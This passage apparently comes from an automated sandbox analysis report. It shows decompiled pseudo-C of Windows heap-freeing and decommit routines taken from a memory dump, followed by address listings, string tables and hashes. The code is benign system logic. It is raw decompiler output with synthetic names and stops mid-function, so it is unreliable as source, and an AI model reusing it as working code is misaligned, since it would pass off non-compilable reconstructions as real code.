								__eflags = _t373 -  *((intOrPtr*)(_t407 + 4));
								if(_t373 <  *((intOrPtr*)(_t407 + 4))) {
									_t301 = _t373;
									break;
								}
								_t299 =  *_t407;
								__eflags = _t299;
								if(_t299 == 0) {
									_t301 =  *((intOrPtr*)(_t407 + 4)) - 1;
									__eflags =  *((intOrPtr*)(_t407 + 4)) - 1;
									break;
								} else {
									_t407 = _t299;
									continue;
								}
							}
							_t62 =  &(_t414[4]); // -16
							E0109BC04(_t307, _t407, 1, _t62, _t301, _t373);
							goto L36;
						}
					}
					L11:
					_t402 = _t419[6];
					_t25 =  &(_t419[4]); // -16
					_t350 = _t25;
					_t254 =  *_t350;
					_v12 = _t254;
					_v20 = _t402;
					_t255 =  *((intOrPtr*)(_t254 + 4));
					__eflags =  *_t402 - _t255;
					if( *_t402 != _t255) {
						L61:
						_push(_t350);
						_push( *_t402);
						E0113A80D(_t307, 0xd, _t350, _t255);
						goto L3;
					}
					__eflags =  *_t402 - _t350;
					if( *_t402 != _t350) {
						goto L61;
					}
					 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t419 & 0x0000ffff);
					_t404 =  *(_t307 + 0xb4);
					__eflags = _t404;
					if(_t404 == 0) {
						L20:
						_t352 = _v20;
						_t258 = _v12;
						 *_t352 = _t258;
						 *(_t258 + 4) = _t352;
						__eflags = _t419[1] & 0x00000008;
						if((_t419[1] & 0x00000008) != 0) {
							_t259 = E0109A229(_t307, _t419);
							__eflags = _t259;
							if(_t259 != 0) {
								goto L21;
							} else {
								E0109A309(_t307, _t419,  *_t419 & 0x0000ffff, 1);
								goto L3;
							}
						}
						L21:
						_t354 = _t419[1];
						__eflags = _t354 & 0x00000004;
						if((_t354 & 0x00000004) != 0) {
							_t415 = ( *_t419 & 0x0000ffff) * 8 - 0x10;
							__eflags = _t354 & 0x00000002;
							if((_t354 & 0x00000002) != 0) {
								__eflags = _t415 - 4;
								if(_t415 > 4) {
									_t415 = _t415 - 4;
									__eflags = _t415;
								}
							}
							_t91 =  &(_t419[8]); // -8
							_t262 = E010CD540(_t91, _t415, 0xfeeefeee);
							_v20 = _t262;
							__eflags = _t262 - _t415;
							if(_t262 != _t415) {
								_t357 =  *[fs:0x30];
								__eflags =  *(_t357 + 0xc);
								if( *(_t357 + 0xc) == 0) {
									_push("HEAP: ");
									E0107B150();
								} else {
									E0107B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push(_v20 + 0x10 + _t419);
								E0107B150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t419);
								_t271 =  *[fs:0x30];
								_t421 = _t421 + 0xc;
								__eflags =  *((char*)(_t271 + 2));
								if( *((char*)(_t271 + 2)) != 0) {
									 *0x1166378 = 1;
									asm("int3");
									 *0x1166378 = 0;
								}
							}
						}
						_t381 = _a4;
						_t414 = _t419;
						_t419[1] = 0;
						_t419[3] = 0;
						 *_t381 =  *_t381 + ( *_t419 & 0x0000ffff);
						 *_t419 =  *_t381;
						 *(_t419 + 4 +  *_t381 * 8) =  *_t381 ^  *(_t307 + 0x54);
						L4:
						_t420 = _t414 +  *_t381 * 8;
						if( *(_t307 + 0x4c) == 0) {
							L6:
							while((( *(_t307 + 0x4c) >> 0x00000014 &  *(_t307 + 0x52) ^ _t420[0]) & 0x00000001) == 0) {
								__eflags =  *(_t307 + 0x4c);
								if( *(_t307 + 0x4c) != 0) {
									_t390 =  *(_t307 + 0x50) ^  *_t420;
									 *_t420 = _t390;
									_t328 = _t390 >> 0x00000010 ^ _t390 >> 0x00000008 ^ _t390;
									__eflags = _t390 >> 0x18 - _t328;
									if(__eflags != 0) {
										_push(_t328);
										E0112FA2B(_t307, _t307, _t420, _t414, _t420, __eflags);
									}
								}
								__eflags = _v5;
								if(_v5 == 0) {
									L94:
									_t382 = _t420[3];
									_t137 =  &(_t420[2]); // -16
									_t309 = _t137;
									_t186 =  *_t309;
									_v20 = _t186;
									_v16 = _t382;
									_t187 =  *((intOrPtr*)(_t186 + 4));
									__eflags =  *_t382 - _t187;
									if( *_t382 != _t187) {
										L63:
										_push(_t309);
										_push( *_t382);
										_push(_t187);
										_push(_t309);
										_push(0xd);
										L64:
										E0113A80D(_t307);
										continue;
									}
									__eflags =  *_t382 - _t309;
									if( *_t382 != _t309) {
										goto L63;
									}
									 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t420 & 0x0000ffff);
									_t393 =  *(_t307 + 0xb4);
									__eflags = _t393;
									if(_t393 == 0) {
										L104:
										_t330 = _v16;
										_t190 = _v20;
										 *_t330 = _t190;
										 *(_t190 + 4) = _t330;
										__eflags = _t420[0] & 0x00000008;
										if((_t420[0] & 0x00000008) == 0) {
											L107:
											_t331 = _t420[0];
											__eflags = _t331 & 0x00000004;
											if((_t331 & 0x00000004) != 0) {
												_t196 = ( *_t420 & 0x0000ffff) * 8 - 0x10;
												_v12 = _t196;
												__eflags = _t331 & 0x00000002;
												if((_t331 & 0x00000002) != 0) {
													__eflags = _t196 - 4;
													if(_t196 > 4) {
														_t196 = _t196 - 4;
														__eflags = _t196;
														_v12 = _t196;
													}
												}
												_t162 =  &(_t420[4]); // -8
												_t197 = E010CD540(_t162, _t196, 0xfeeefeee);
												_v20 = _t197;
												__eflags = _t197 - _v12;
												if(_t197 != _v12) {
													_t335 =  *[fs:0x30];
													__eflags =  *(_t335 + 0xc);
													if( *(_t335 + 0xc) == 0) {
														_push("HEAP: ");
														E0107B150();
													} else {
														E0107B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
													}
													_push(_v20 + 0x10 + _t420);
													E0107B150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t420);
													_t203 =  *[fs:0x30];
													__eflags =  *((char*)(_t203 + 2));
													if( *((char*)(_t203 + 2)) != 0) {
														 *0x1166378 = 1;
														asm("int3");
														 *0x1166378 = 0;
													}
												}
											}
											_t394 = _a4;
											_t414[1] = 0;
											_t414[3] = 0;
											 *_t394 =  *_t394 + ( *_t420 & 0x0000ffff);
											 *_t414 =  *_t394;
											 *(_t414 + 4 +  *_t394 * 8) =  *_t394 ^  *(_t307 + 0x54);
											break;
										}
										_t207 = E0109A229(_t307, _t420);
										__eflags = _t207;
										if(_t207 != 0) {
											goto L107;
										}
										E0109A309(_t307, _t420,  *_t420 & 0x0000ffff, 1);
										continue;
									}
									_t342 =  *_t420 & 0x0000ffff;
									while(1) {
										__eflags = _t342 -  *((intOrPtr*)(_t393 + 4));
										if(_t342 <  *((intOrPtr*)(_t393 + 4))) {
											break;
										}
										_t210 =  *_t393;
										__eflags = _t210;
										if(_t210 == 0) {
											_t212 =  *((intOrPtr*)(_t393 + 4)) - 1;
											__eflags =  *((intOrPtr*)(_t393 + 4)) - 1;
											L103:
											_t146 =  &(_t420[2]); // -16
											E0109BC04(_t307, _t393, 1, _t146, _t212, _t342);
											goto L104;
										}
										_t393 = _t210;
									}
									_t212 = _t342;
									goto L103;
								} else {
									_t384 = _t414[6];
									_t102 =  &(_t414[4]); // -16
									_t311 = _t102;
									_t215 =  *_t311;
									_v20 = _t215;
									_v16 = _t384;
									_t216 =  *((intOrPtr*)(_t215 + 4));
									__eflags =  *_t384 - _t216;
									if( *_t384 != _t216) {
										L92:
										_push(_t311);
										_push( *_t384);
										E0113A80D(_t307, 0xd, _t311, _t216);
										L93:
										_v5 = 0;
										goto L94;
									}
									__eflags =  *_t384 - _t311;
									if( *_t384 != _t311) {
										goto L92;
									}
									 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t414 & 0x0000ffff);
									_t386 =  *(_t307 + 0xb4);
									__eflags = _t386;
									if(_t386 == 0) {
										L79:
										_t313 = _v16;
										_t219 = _v20;
										 *_t313 = _t219;
										 *(_t219 + 4) = _t313;
										__eflags = _t414[1] & 0x00000008;
										if((_t414[1] & 0x00000008) == 0) {
											L82:
											_t314 = _t414[1];
											__eflags = _t314 & 0x00000004;
											if((_t314 & 0x00000004) != 0) {
												_t221 = ( *_t414 & 0x0000ffff) * 8 - 0x10;
												_v12 = _t221;
												__eflags = _t314 & 0x00000002;
												if((_t314 & 0x00000002) != 0) {
													__eflags = _t221 - 4;
													if(_t221 > 4) {
														_t221 = _t221 - 4;
														__eflags = _t221;
														_v12 = _t221;
													}
												}
												_t127 =  &(_t414[8]); // -8
												_t222 = E010CD540(_t127, _t221, 0xfeeefeee);
												_v20 = _t222;
												__eflags = _t222 - _v12;
												if(_t222 != _v12) {
													_t316 =  *[fs:0x30];
													__eflags =  *(_t316 + 0xc);
													if( *(_t316 + 0xc) == 0) {
														_push("HEAP: ");
														E0107B150();
													} else {
														E0107B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
													}
													_push(_v20 + 0x10 + _t414);
													E0107B150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t414);
													_t228 =  *[fs:0x30];
													_t421 = _t421 + 0xc;
													__eflags =  *((char*)(_t228 + 2));
													if( *((char*)(_t228 + 2)) != 0) {
														 *0x1166378 = 1;
														asm("int3");
														 *0x1166378 = 0;
													}
												}
											}
											goto L93;
										}
										_t232 = E0109A229(_t307, _t414);
										__eflags = _t232;
										if(_t232 != 0) {
											goto L82;
										}
										E0109A309(_t307, _t414,  *_t414 & 0x0000ffff, 1);
										goto L93;
									}
									_t323 =  *_t414 & 0x0000ffff;
									while(1) {
										__eflags = _t323 -  *((intOrPtr*)(_t386 + 4));
										if(_t323 <  *((intOrPtr*)(_t386 + 4))) {
											break;
										}
										_t235 =  *_t386;
										__eflags = _t235;
										if(_t235 == 0) {
											_t237 =  *((intOrPtr*)(_t386 + 4)) - 1;
											__eflags =  *((intOrPtr*)(_t386 + 4)) - 1;
											L78:
											_t111 =  &(_t414[4]); // -16
											E0109BC04(_t307, _t386, 1, _t111, _t237, _t323);
											goto L79;
										}
										_t386 = _t235;
									}
									_t237 = _t323;
									goto L78;
								}
							}
							return _t414;
						}
						_t398 =  *(_t307 + 0x50) ^  *_t420;
						_t347 = _t398 >> 0x00000010 ^ _t398 >> 0x00000008 ^ _t398;
						if(_t398 >> 0x18 != _t347) {
							_push(_t347);
							_push(0);
							_push(0);
							_push(_t420);
							_push(3);
							goto L64;
						}
						goto L6;
					} else {
						_t277 =  *_t419 & 0x0000ffff;
						_v16 = _t277;
						while(1) {
							__eflags = _t277 -  *((intOrPtr*)(_t404 + 4));
							if(_t277 <  *((intOrPtr*)(_t404 + 4))) {
								break;
							}
							_t279 =  *_t404;
							__eflags = _t279;
							if(_t279 == 0) {
								_t277 =  *((intOrPtr*)(_t404 + 4)) - 1;
								__eflags =  *((intOrPtr*)(_t404 + 4)) - 1;
								break;
							} else {
								_t404 = _t279;
								_t277 =  *_t419 & 0x0000ffff;
								continue;
							}
						}
						E0109BC04(_t307, _t404, 1, _t350, _t277, _v16);
						goto L20;
					}
				}
			}




















































































                                                                            0x010999ca
                                                                            0x010999cc
                                                                            0x010999df
                                                                            0x010999e3
                                                                            0x010999f8
                                                                            0x010999fb
                                                                            0x010999fb
                                                                            0x00000000
                                                                            0x01099a48
                                                                            0x01099a48
                                                                            0x01099a4c
                                                                            0x01099a51
                                                                            0x01099a55
                                                                            0x01099a61
                                                                            0x01099a66
                                                                            0x01099a68
                                                                            0x010e1457
                                                                            0x010e145c
                                                                            0x010e145c
                                                                            0x01099a68
                                                                            0x01099a6e
                                                                            0x01099a71
                                                                            0x01099a74
                                                                            0x01099a76
                                                                            0x010e1466
                                                                            0x010e1469
                                                                            0x010e1469
                                                                            0x010e146c
                                                                            0x010e146e
                                                                            0x010e1471
                                                                            0x010e1474
                                                                            0x010e1477
                                                                            0x010e1479
                                                                            0x010e159c
                                                                            0x010e159c
                                                                            0x010e159d
                                                                            0x010e15a6
                                                                            0x010e15ab
                                                                            0x010e15ab
                                                                            0x00000000
                                                                            0x010e15ab
                                                                            0x010e147f
                                                                            0x010e1481
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x010e148a
                                                                            0x010e148d
                                                                            0x010e1493
                                                                            0x010e1495
                                                                            0x010e14c0
                                                                            0x010e14c0
                                                                            0x010e14c3
                                                                            0x010e14c6
                                                                            0x010e14c8
                                                                            0x010e14cb
                                                                            0x010e14cf
                                                                            0x010e14f2
                                                                            0x010e14f2
                                                                            0x010e14f5
                                                                            0x010e14f8
                                                                            0x010e1501
                                                                            0x010e1508
                                                                            0x010e150b
                                                                            0x010e150e
                                                                            0x010e1510
                                                                            0x010e1513
                                                                            0x010e1515
                                                                            0x010e1515
                                                                            0x010e1518
                                                                            0x010e1518
                                                                            0x010e1513
                                                                            0x010e1521
                                                                            0x010e1525
                                                                            0x010e152a
                                                                            0x010e152d
                                                                            0x010e1530
                                                                            0x010e1532
                                                                            0x010e1539
                                                                            0x010e153d
                                                                            0x010e155d
                                                                            0x010e1562
                                                                            0x010e153f
                                                                            0x010e1555
                                                                            0x010e155a
                                                                            0x010e1570
                                                                            0x010e1577
                                                                            0x010e157c
                                                                            0x010e1582
                                                                            0x010e1585
                                                                            0x010e1589
                                                                            0x010e158b
                                                                            0x010e1592
                                                                            0x010e1593
                                                                            0x010e1593
                                                                            0x010e1589
                                                                            0x010e1530
                                                                            0x00000000
                                                                            0x010e14f8
                                                                            0x010e14d5
                                                                            0x010e14da
                                                                            0x010e14dc
                                                                            0x00000000
                                                                            0x010e14de
                                                                            0x010e14e8
                                                                            0x00000000
                                                                            0x010e14e8
                                                                            0x010e1497
                                                                            0x010e1497
                                                                            0x010e14a4
                                                                            0x010e14a4
                                                                            0x010e14a7
                                                                            0x010e14a9
                                                                            0x010e14ab
                                                                            0x010e14ab
                                                                            0x010e149c
                                                                            0x010e149e
                                                                            0x010e14a0
                                                                            0x010e14b0
                                                                            0x010e14b0
                                                                            0x00000000
                                                                            0x010e14a2
                                                                            0x010e14a2
                                                                            0x00000000
                                                                            0x010e14a2
                                                                            0x010e14a0
                                                                            0x010e14b3
                                                                            0x010e14bb
                                                                            0x00000000
                                                                            0x010e14bb
                                                                            0x010e1495
                                                                            0x01099a7c
                                                                            0x01099a7c
                                                                            0x01099a7f
                                                                            0x01099a7f
                                                                            0x01099a82
                                                                            0x01099a84
                                                                            0x01099a87
                                                                            0x01099a8a
                                                                            0x01099a8d
                                                                            0x01099a8f
                                                                            0x010e166a
                                                                            0x010e166a
                                                                            0x010e166b
                                                                            0x010e1674
                                                                            0x00000000
                                                                            0x010e1674
                                                                            0x01099a95
                                                                            0x01099a97
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x01099aa0
                                                                            0x01099aa3
                                                                            0x01099aa9
                                                                            0x01099aab
                                                                            0x01099ad7
                                                                            0x01099ad7
                                                                            0x01099ada
                                                                            0x01099add
                                                                            0x01099adf
                                                                            0x01099ae2
                                                                            0x01099ae6
                                                                            0x01099b22
                                                                            0x01099b27
                                                                            0x01099b29
                                                                            0x00000000
                                                                            0x01099b2b
                                                                            0x010e15be
                                                                            0x00000000
                                                                            0x010e15be
                                                                            0x01099b29
                                                                            0x01099ae8
                                                                            0x01099ae8
                                                                            0x01099aeb
                                                                            0x01099aee
                                                                            0x010e15cb
                                                                            0x010e15d2
                                                                            0x010e15d5
                                                                            0x010e15d7
                                                                            0x010e15da
                                                                            0x010e15dc
                                                                            0x010e15dc
                                                                            0x010e15dc
                                                                            0x010e15da
                                                                            0x010e15e5
                                                                            0x010e15e9
                                                                            0x010e15ee
                                                                            0x010e15f1
                                                                            0x010e15f3
                                                                            0x010e15f9
                                                                            0x010e1600
                                                                            0x010e1604
                                                                            0x010e1624
                                                                            0x010e1629
                                                                            0x010e1606
                                                                            0x010e161c
                                                                            0x010e1621
                                                                            0x010e1637
                                                                            0x010e163e
                                                                            0x010e1643
                                                                            0x010e1649
                                                                            0x010e164c
                                                                            0x010e1650
                                                                            0x010e1656
                                                                            0x010e165d
                                                                            0x010e165e
                                                                            0x010e165e
                                                                            0x010e1650
                                                                            0x010e15f3
                                                                            0x01099af4
                                                                            0x01099af7
                                                                            0x01099afc
                                                                            0x01099b00
                                                                            0x01099b04
                                                                            0x01099b08
                                                                            0x01099b14
                                                                            0x010999fe
                                                                            0x01099a04
                                                                            0x01099a07
                                                                            0x00000000
                                                                            0x01099a29
                                                                            0x010e169c
                                                                            0x010e16a0
                                                                            0x010e16a5
                                                                            0x010e16a9
                                                                            0x010e16b5
                                                                            0x010e16ba
                                                                            0x010e16bc
                                                                            0x010e16be
                                                                            0x010e16c3
                                                                            0x010e16c3
                                                                            0x010e16bc
                                                                            0x010e16c8
                                                                            0x010e16cc
                                                                            0x010e181b
                                                                            0x010e181b
                                                                            0x010e181e
                                                                            0x010e181e
                                                                            0x010e1821
                                                                            0x010e1823
                                                                            0x010e1826
                                                                            0x010e1829
                                                                            0x010e182c
                                                                            0x010e182e
                                                                            0x010e1688
                                                                            0x010e1688
                                                                            0x010e1689
                                                                            0x010e168b
                                                                            0x010e168c
                                                                            0x010e168d
                                                                            0x010e168f
                                                                            0x010e1692
                                                                            0x00000000
                                                                            0x010e1692
                                                                            0x010e1834
                                                                            0x010e1836
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x010e183f
                                                                            0x010e1842
                                                                            0x010e1848
                                                                            0x010e184a
                                                                            0x010e1875
                                                                            0x010e1875
                                                                            0x010e1878
                                                                            0x010e187b
                                                                            0x010e187d
                                                                            0x010e1880
                                                                            0x010e1884
                                                                            0x010e18a7
                                                                            0x010e18a7
                                                                            0x010e18aa
                                                                            0x010e18ad
                                                                            0x010e18b6
                                                                            0x010e18bd
                                                                            0x010e18c0
                                                                            0x010e18c3
                                                                            0x010e18c5
                                                                            0x010e18c8
                                                                            0x010e18ca
                                                                            0x010e18ca
                                                                            0x010e18cd
                                                                            0x010e18cd
                                                                            0x010e18c8
                                                                            0x010e18d5
                                                                            0x010e18da
                                                                            0x010e18df
                                                                            0x010e18e2
                                                                            0x010e18e5
                                                                            0x010e18e7
                                                                            0x010e18ee
                                                                            0x010e18f2
                                                                            0x010e1912
                                                                            0x010e1917
                                                                            0x010e18f4
                                                                            0x010e190a
                                                                            0x010e190f
                                                                            0x010e1925
                                                                            0x010e192c
                                                                            0x010e1931
                                                                            0x010e193a
                                                                            0x010e193e
                                                                            0x010e1940
                                                                            0x010e1947
                                                                            0x010e1948
                                                                            0x010e1948
                                                                            0x010e193e
                                                                            0x010e18e5
                                                                            0x010e194f
                                                                            0x010e1952
                                                                            0x010e1956
                                                                            0x010e195d
                                                                            0x010e1961
                                                                            0x010e196d
                                                                            0x00000000
                                                                            0x010e196d
                                                                            0x010e188a
                                                                            0x010e188f
                                                                            0x010e1891
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x010e189d
                                                                            0x00000000
                                                                            0x010e189d
                                                                            0x010e184c
                                                                            0x010e1859
                                                                            0x010e1859
                                                                            0x010e185c
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x010e1851
                                                                            0x010e1853
                                                                            0x010e1855
                                                                            0x010e1865
                                                                            0x010e1865
                                                                            0x010e1866
                                                                            0x010e1868
                                                                            0x010e1870
                                                                            0x00000000
                                                                            0x010e1870
                                                                            0x010e1857
                                                                            0x010e1857
                                                                            0x010e185e
                                                                            0x00000000
                                                                            0x010e16d2
                                                                            0x010e16d2
                                                                            0x010e16d5
                                                                            0x010e16d5
                                                                            0x010e16d8
                                                                            0x010e16da
                                                                            0x010e16dd
                                                                            0x010e16e0
                                                                            0x010e16e3
                                                                            0x010e16e5
                                                                            0x010e1808
                                                                            0x010e1808
                                                                            0x010e1809
                                                                            0x010e1812
                                                                            0x010e1817
                                                                            0x010e1817
                                                                            0x00000000
                                                                            0x010e1817
                                                                            0x010e16eb
                                                                            0x010e16ed
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x010e16f6
                                                                            0x010e16f9
                                                                            0x010e16ff
                                                                            0x010e1701
                                                                            0x010e172c
                                                                            0x010e172c
                                                                            0x010e172f
                                                                            0x010e1732
                                                                            0x010e1734
                                                                            0x010e1737
                                                                            0x010e173b
                                                                            0x010e175e
                                                                            0x010e175e
                                                                            0x010e1761
                                                                            0x010e1764
                                                                            0x010e176d
                                                                            0x010e1774
                                                                            0x010e1777
                                                                            0x010e177a
                                                                            0x010e177c
                                                                            0x010e177f
                                                                            0x010e1781
                                                                            0x010e1781
                                                                            0x010e1784
                                                                            0x010e1784
                                                                            0x010e177f
                                                                            0x010e178c
                                                                            0x010e1791
                                                                            0x010e1796
                                                                            0x010e1799
                                                                            0x010e179c
                                                                            0x010e179e
                                                                            0x010e17a5
                                                                            0x010e17a9
                                                                            0x010e17c9
                                                                            0x010e17ce
                                                                            0x010e17ab
                                                                            0x010e17c1
                                                                            0x010e17c6
                                                                            0x010e17dc
                                                                            0x010e17e3
                                                                            0x010e17e8
                                                                            0x010e17ee
                                                                            0x010e17f1
                                                                            0x010e17f5
                                                                            0x010e17f7
                                                                            0x010e17fe
                                                                            0x010e17ff
                                                                            0x010e17ff
                                                                            0x010e17f5
                                                                            0x010e179c
                                                                            0x00000000
                                                                            0x010e1764
                                                                            0x010e1741
                                                                            0x010e1746
                                                                            0x010e1748
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x010e1754
                                                                            0x00000000
                                                                            0x010e1754
                                                                            0x010e1703
                                                                            0x010e1710
                                                                            0x010e1710
                                                                            0x010e1713
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x010e1708
                                                                            0x010e170a
                                                                            0x010e170c
                                                                            0x010e171c
                                                                            0x010e171c
                                                                            0x010e171d
                                                                            0x010e171f
                                                                            0x010e1727
                                                                            0x00000000
                                                                            0x010e1727
                                                                            0x010e170e
                                                                            0x010e170e
                                                                            0x010e1715
                                                                            0x00000000
                                                                            0x010e1715
                                                                            0x010e16cc
                                                                            0x01099a45
                                                                            0x01099a45
                                                                            0x01099a0e
                                                                            0x01099a1c
                                                                            0x01099a23
                                                                            0x010e167e
                                                                            0x010e167f
                                                                            0x010e1681
                                                                            0x010e1683
                                                                            0x010e1684
                                                                            0x00000000
                                                                            0x010e1684
                                                                            0x00000000
                                                                            0x01099aad
                                                                            0x01099aad
                                                                            0x01099ab0
                                                                            0x01099ab3
                                                                            0x01099ab3
                                                                            0x01099ab6
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x01099ab8
                                                                            0x01099aba
                                                                            0x01099abc
                                                                            0x01099ac8
                                                                            0x01099ac8
                                                                            0x00000000
                                                                            0x01099abe
                                                                            0x01099abe
                                                                            0x01099ac0
                                                                            0x00000000
                                                                            0x01099ac0
                                                                            0x01099abc
                                                                            0x01099ad2
                                                                            0x00000000
                                                                            0x01099ad2
                                                                            0x01099aab

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.300285739.0000000001050000.00000040.00000001.sdmp, Offset: 01050000, based on PE: true
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                            • API String ID: 0-3178619729
                                                                            • Opcode ID: 5037a24ebfa675f104a492cd9b44065d81e3d8e8bc646a5fd7f7c6954d95f86d
                                                                            • Instruction ID: 6d9e188185d0f3069a8bcb9379fd4176fc643984a24c250ff9003b3647183cbd
                                                                            • Opcode Fuzzy Hash: 5037a24ebfa675f104a492cd9b44065d81e3d8e8bc646a5fd7f7c6954d95f86d
                                                                            • Instruction Fuzzy Hash: 8F22C170A002469FEB65CF2AC498B7ABBF5EF44704F1885ADE8D68B341E775D881CB50
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0109B477, Relevance: 4.2, Strings: 3, Instructions: 405COMMONCrypto
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 67%
                                                                            			E0109B477(signed int __ecx, signed int* __edx) {
				signed int _v8;
				signed int _v12;
				intOrPtr* _v16;
				signed int* _v20;
				signed int _v24;
				char _v28;
				signed int _v44;
				char _v48;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t131;
				signed char _t134;
				signed int _t139;
				void* _t141;
				signed int* _t143;
				signed int* _t144;
				intOrPtr* _t147;
				char _t160;
				signed int* _t163;
				signed char* _t164;
				intOrPtr _t165;
				signed int* _t167;
				signed char* _t168;
				intOrPtr _t193;
				intOrPtr* _t195;
				signed int _t203;
				signed int _t209;
				signed int _t211;
				intOrPtr _t214;
				intOrPtr* _t231;
				intOrPtr* _t236;
				signed int _t237;
				intOrPtr* _t238;
				signed int _t240;
				intOrPtr _t241;
				char _t243;
				signed int _t252;
				signed int _t254;
				signed char _t259;
				signed int _t264;
				signed int _t268;
				intOrPtr _t277;
				unsigned int _t279;
				signed int* _t283;
				intOrPtr* _t284;
				unsigned int _t287;
				signed int _t291;
				signed int _t293;

				_v8 =  *0x116d360 ^ _t293;
				_t223 = __edx;
				_v20 = __edx;
				_t291 = __ecx;
				_t276 =  *__edx;
				_t231 = E0109B8E4( *__edx);
				_t292 = __ecx + 0x8c;
				_v16 = _t231;
				if(_t231 == __ecx + 0x8c) {
					L38:
					_t131 = 0;
					L34:
					return E010BB640(_t131, _t223, _v8 ^ _t293, _t276, _t291, _t292);
				}
				if( *0x1168748 >= 1) {
					__eflags =  *((intOrPtr*)(_t231 + 0x14)) -  *__edx;
					if(__eflags < 0) {
						_t214 =  *[fs:0x30];
						__eflags =  *(_t214 + 0xc);
						if( *(_t214 + 0xc) == 0) {
							_push("HEAP: ");
							E0107B150();
						} else {
							E0107B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push("(UCRBlock->Size >= *Size)");
						E0107B150();
						__eflags =  *0x1167bc8;
						if(__eflags == 0) {
							__eflags = 1;
							E01132073(_t223, 1, _t291, 1);
						}
						_t231 = _v16;
					}
				}
				_t5 = _t231 - 8; // -8
				_t292 = _t5;
				_t134 =  *((intOrPtr*)(_t292 + 6));
				if(_t134 != 0) {
					_t223 = (_t292 & 0xffff0000) - ((_t134 & 0x000000ff) << 0x10) + 0x10000;
				} else {
					_t223 = _t291;
				}
				_t276 = _v20;
				_v28 =  *((intOrPtr*)(_t231 + 0x10));
				_t139 =  *(_t291 + 0xcc) ^  *0x1168a68;
				_v12 = _t139;
				if(_t139 != 0) {
					 *0x116b1e0(_t291,  &_v28, _t276);
					_t141 = _v12();
					goto L8;
				} else {
					_t203 =  *((intOrPtr*)(_t231 + 0x14));
					_v12 = _t203;
					if(_t203 -  *_t276 <=  *(_t291 + 0x6c) << 3) {
						_t264 = _v12;
						__eflags = _t264 -  *(_t291 + 0x5c) << 3;
						if(__eflags < 0) {
							 *_t276 = _t264;
						}
					}
					_t209 =  *(_t291 + 0x40) & 0x00040000;
					asm("sbb ecx, ecx");
					_t268 = ( ~_t209 & 0x0000003c) + 4;
					_v12 = _t268;
					if(_t209 != 0) {
						_push(0);
						_push(0x14);
						_push( &_v48);
						_push(3);
						_push(_t291);
						_push(0xffffffff);
						_t211 = E010B9730();
						__eflags = _t211;
						if(_t211 < 0) {
							L56:
							_push(_t268);
							_t276 = _t291;
							E0113A80D(_t291, 1, _v44, 0);
							_t268 = 4;
							goto L7;
						}
						__eflags = _v44 & 0x00000060;
						if((_v44 & 0x00000060) == 0) {
							goto L56;
						}
						__eflags = _v48 - _t291;
						if(__eflags != 0) {
							goto L56;
						}
						_t268 = _v12;
					}
					L7:
					_push(_t268);
					_push(0x1000);
					_push(_v20);
					_push(0);
					_push( &_v28);
					_push(0xffffffff);
					_t141 = E010B9660();
					 *((intOrPtr*)(_t291 + 0x20c)) =  *((intOrPtr*)(_t291 + 0x20c)) + 1;
					L8:
					if(_t141 < 0) {
						 *((intOrPtr*)(_t291 + 0x214)) =  *((intOrPtr*)(_t291 + 0x214)) + 1;
						goto L38;
					}
					_t143 =  *( *[fs:0x30] + 0x50);
					if(_t143 != 0) {
						__eflags =  *_t143;
						if(__eflags == 0) {
							goto L10;
						}
						_t144 =  &(( *( *[fs:0x30] + 0x50))[0x89]);
						L11:
						if( *_t144 != 0) {
							__eflags =  *( *[fs:0x30] + 0x240) & 0x00000001;
							if(__eflags != 0) {
								E0113138A(_t223, _t291, _v28,  *_v20, 2);
							}
						}
						if( *((intOrPtr*)(_t291 + 0x4c)) != 0) {
							_t287 =  *(_t291 + 0x50) ^  *_t292;
							 *_t292 = _t287;
							_t259 = _t287 >> 0x00000010 ^ _t287 >> 0x00000008 ^ _t287;
							if(_t287 >> 0x18 != _t259) {
								_push(_t259);
								E0112FA2B(_t223, _t291, _t292, _t291, _t292, __eflags);
							}
						}
						_t147 = _v16 + 8;
						 *((char*)(_t292 + 2)) = 0;
						 *((char*)(_t292 + 7)) = 0;
						_t236 =  *((intOrPtr*)(_t147 + 4));
						_t277 =  *_t147;
						_v24 = _t236;
						_t237 =  *_t236;
						_v12 = _t237;
						_t238 = _v16;
						if(_t237 !=  *((intOrPtr*)(_t277 + 4)) || _v12 != _t147) {
							_push(_t238);
							_push(_v12);
							E0113A80D(0, 0xd, _t147,  *((intOrPtr*)(_t277 + 4)));
							_t238 = _v16;
						} else {
							_t195 = _v24;
							 *_t195 = _t277;
							 *((intOrPtr*)(_t277 + 4)) = _t195;
						}
						if( *(_t238 + 0x14) == 0) {
							L22:
							_t223[0x30] = _t223[0x30] - 1;
							_t223[0x2c] = _t223[0x2c] - ( *(_t238 + 0x14) >> 0xc);
